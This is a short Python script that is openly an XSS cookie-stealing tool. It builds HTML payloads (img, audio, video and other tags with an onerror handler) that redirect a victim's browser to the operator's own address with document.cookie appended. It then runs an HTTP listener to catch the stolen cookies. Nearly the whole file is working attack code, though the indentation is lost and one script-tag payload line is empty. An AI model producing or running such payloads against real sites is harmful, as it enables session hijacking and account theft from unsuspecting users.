#!/usr/bin/env python
import util
import sys
import http.server
import socketserver
from http.server import HTTPServer, BaseHTTPRequestHandler
def getCookieAddress(address, port):
if port == 80:
return "'http://%s/?x='+document.cookie" % address
else:
return "'http://%s:%d/?x='+document.cookie" % (address, port)
def generatePayload(type, address, port):
payloads = []
cookieAddress = getCookieAddress(address, port)
media_tags = ["img","audio","video","image","body","script","object"]
if type in media_tags:
payloads.append('<%s src=1 href=1 onerror="javascript:document.location=%s">' % (type, cookieAddress))
if type == "script":
payloads.append('' % cookieAddress)
if len(payloads) == 0:
return None
return "\n".join(payloads)
class XssServer(BaseHTTPRequestHandler):
def _set_headers(self):
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
def _html(self):
content = f"Got'cha
"
return content.encode("utf8") # NOTE: must return a bytes object!
def do_GET(self):
self._set_headers()
self.wfile.write(self._html())
def do_HEAD(self):
self._set_headers()
def do_POST(self):
self._set_headers()
self.wfile.write(self._html())
if __name__ == "__main__":
if len(sys.argv) < 2:
print("Usage: %s [port]" % sys.argv[0])
exit(1)
listen_port = None if len(sys.argv) < 3 else int(sys.argv[2])
payload_type = sys.argv[1].lower()
local_address = util.getAddress()
# choose random port
if listen_port is None:
sock = util.openServer(local_address)
if not sock:
exit(1)
listen_port = sock.getsockname()[1]
sock.close()
payload = generatePayload(payload_type, local_address, listen_port)
if not payload:
print("Unsupported payload type")
exit(1)
print("Payload:")
print(payload)
print()
httpd = HTTPServer((local_address, listen_port), XssServer)
print(f"Starting httpd server on {local_address}:{listen_port}")
httpd.serve_forever()